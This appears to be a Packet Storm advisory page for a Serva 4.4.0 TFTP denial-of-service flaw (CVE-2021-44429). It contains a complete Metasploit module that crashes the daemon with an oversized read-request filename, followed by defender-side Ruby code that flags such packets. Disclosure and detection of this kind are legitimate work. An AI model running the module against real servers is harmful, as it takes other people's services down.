CVE-2021-44429: Serva 4.4.0 TFTP Remote Buffer Overflow ≈ Packet Storm
Serva 4.4.0 allows remote attackers to cause a denial of service (daemon crash) via a TFTP read (RRQ) request, aka opcode 1, a related issue to CVE-2013-0145.
# Exploit Title: Serva 4.4.0 TFTP Server Remote Buffer Overflow (Metasploit)
# Date: 2021-11-23
# Exploit Author: Yehia Elghaly
# Vendor Homepage: https://www.vercot.com/
# Software Link : https://www.vercot.com/~serva/download/Serva_Community_v4.4.0-21081411.zip
# Tested Version: 4.4.0
# Tested on: Windows XP SP3 - Windows 7 Professional x86 SP1 - Windows 10 x64

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Udp
  include Msf::Auxiliary::Dos

  Rank = ExcellentRanking

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Serva 4.4.0 TFTP Remote Buffer Overflow',
      'Description'    => %q{
        The Serva TFTP server version 4.4.0 can be brought down by sending
        a special Read request.
      },
      'Author'         => 'Yehia Elghaly',
      'License'        => MSF_LICENSE,
      'DisclosureDate' => '2021-11-23'))

    register_options([Opt::RPORT(69)])
  end

  def run
    connect_udp
    print_status("Sending Read request...")

    # TFTP request layout: opcode | filename | NUL | mode | NUL
    sploit = "\x00\x01"    # opcode 1 (RRQ, read request)
    sploit += "A" * 257    # 257-byte filename field
    sploit += "\x00"       # filename terminator
    sploit += "netascii"   # transfer mode
    sploit += "\x00"       # mode terminator

    udp_sock.put(sploit)
    disconnect_udp
  end
end
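
For defenders, the crash condition described above (an RRQ whose filename field is far longer than any real boot or config path) is easy to check for in front of a TFTP service or in captured traffic. The following is an added example, not part of the advisory or the Metasploit module; the function name `inspect_tftp_request`, the `MAX_FILENAME` limit of 255 bytes and the sample payloads are assumptions made for illustration.

```ruby
# Added example: defender-side validation of TFTP request payloads (RFC 1350 layout).
# MAX_FILENAME is an assumed policy limit, not a boundary stated in the advisory.
MAX_FILENAME = 255
TFTP_MODES = %w[netascii octet mail].freeze

# Classify one UDP payload addressed to port 69.
# :verdict is :ok, :ignored (not RRQ/WRQ), :malformed or :suspicious.
def inspect_tftp_request(payload)
  data = payload.b
  return { verdict: :malformed, reason: 'shorter than opcode' } if data.bytesize < 2

  opcode = data.unpack1('n')
  return { verdict: :ignored, opcode: opcode } unless [1, 2].include?(opcode)

  # After the opcode: filename NUL mode NUL (option pairs may follow, RFC 2347).
  fields = data.byteslice(2..).split("\x00".b, -1)
  if fields.length < 3
    return { verdict: :malformed, opcode: opcode, reason: 'missing NUL terminators' }
  end

  filename, mode = fields[0], fields[1].downcase
  result = { opcode: opcode, filename_len: filename.bytesize, mode: mode }

  if filename.bytesize > MAX_FILENAME
    result.merge(verdict: :suspicious, reason: 'filename exceeds policy limit')
  elsif filename.empty?
    result.merge(verdict: :malformed, reason: 'empty filename')
  elsif !TFTP_MODES.include?(mode)
    result.merge(verdict: :malformed, reason: 'unknown transfer mode')
  else
    result.merge(verdict: :ok)
  end
end

# Constructed sample payloads (not captured traffic).
SAMPLES = {
  normal:   "\x00\x01boot/pxelinux.0\x00octet\x00",
  oversize: "\x00\x01" + ('A' * 257) + "\x00netascii\x00",
  no_nul:   "\x00\x01file.bin",
  data_pkt: "\x00\x03\x00\x01payload"
}.freeze

if __FILE__ == $PROGRAM_NAME
  SAMPLES.each { |name, pkt| puts "#{name}: #{inspect_tftp_request(pkt)}" }
end
```

Requests classified as `:suspicious` or `:malformed` are candidates for dropping before they reach the daemon and for alerting, since legitimate TFTP clients do not send them.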